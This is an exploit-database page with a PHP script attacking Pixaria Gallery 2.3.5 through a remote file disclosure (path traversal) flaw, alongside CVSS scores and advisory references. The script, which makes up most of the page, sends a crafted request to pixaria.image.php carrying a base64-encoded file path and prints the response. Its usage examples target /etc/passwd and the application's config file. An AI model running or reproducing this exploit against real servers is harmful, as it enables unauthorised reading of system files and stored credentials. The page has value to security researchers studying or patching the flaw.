Pixaria Gallery 2.3.5 (file) Remote File Disclosure Exploit

2009.08.25
Credit: Qabandi
Risk: High
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 7.8/10
Impact Subscore: 6.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: None
Availability impact: None

<?php ini_set("max_execution_time",0); print_r(' || || | || o_,_7 _|| . _o_7 _|| q_|_|| o_///_, ( : / (_) / ( . ___________________ _/QQQQQQQQQQQQQQQQQQQ\__ [q] Pixaria Gallery 2.3.5 __/QQQ/````````````````\QQQ\___ Remote File Disclosure _/QQQQQ/ \QQQQQQ\ [q] _GET <3 /QQQQ/`` ```QQQQ\ /QQQQ/ \QQQQ\ [q] http://pixaria.com |QQQQ/ By Qabandi \QQQQ| |QQQQ| |QQQQ| |QQQQ| From Kuwait, PEACE... |QQQQ| |QQQQ| |QQQQ| |QQQQ\ iqa[a]hotmail.fr /QQQQ| [/] -[hai]- \QQQQ\ __ /QQQQ/ \QQQQ\ /QQ\_QQQQ/ \QQQQ\ \QQQQQQQ/ \QQQQQ\ /QQQQQ/_ ``\QQQQQ\_____________/QQQ/\QQQQ\_ ``\QQQQQQQQQQQQQQQQQQQ/ `\QQQQ\ ``````````````````` ````` ______________________________________________________________________________ / \ | meh..... | \______________________________________________________________________________/ \ No More Private / ````````````````` '); if ($argc<4) { print_r(' ----------------------------------------------------------------------------- Usage: php '.$argv[0].' VICTIM DIR FILE example: php '.$argv[0].' EXAMPLE /demo/ /etc/passwd or if in root dir: example: php '.$argv[0].' EXAMPLE // /etc/passwd php '.$argv[0].' EXAMPLE // ./pixaria.config.php ----------------------------------------------------------------------------- '); die; } function QABANDI($victim,$vic_dir,$file){ $host = $victim; $p = "http://".$host.$vic_dir; $file2 = base64_encode($file); $packet ="GET ".$p."/pixaria.image.php?file=".$file2." HTTP/1.0\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"; $packet.="Pragma: no-cache\r\n"; $packet.="Connection: Close\r\n\r\n"; $o = @fsockopen($host, 80); if(!$o){ echo "\n[x] No response...\n"; die; } fputs($o, $packet); while (!feof($o)) $data .= fread($o, 1024); fclose($o); $_404 = strstr( $data, "HTTP/1.1 404 Not Found" ); if ( !empty($_404) ){ echo "\n[x] 404 Not Found... Make sure of path. \n"; die; } return $data; } $host1 = $argv[1]; $userdir1=$argv[2]; $file= $argv[3]; if ($argc > 2) { echo "Getting file Data....[i9bir]\n"; print_r(QABANDI($host1,$userdir1,$file)); } ?>

References:

http://xforce.iss.net/xforce/xfdb/51994
http://www.securityfocus.com/bid/35802
http://www.pixaria.com/news/article/234
http://www.milw0rm.com/exploits/9257


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top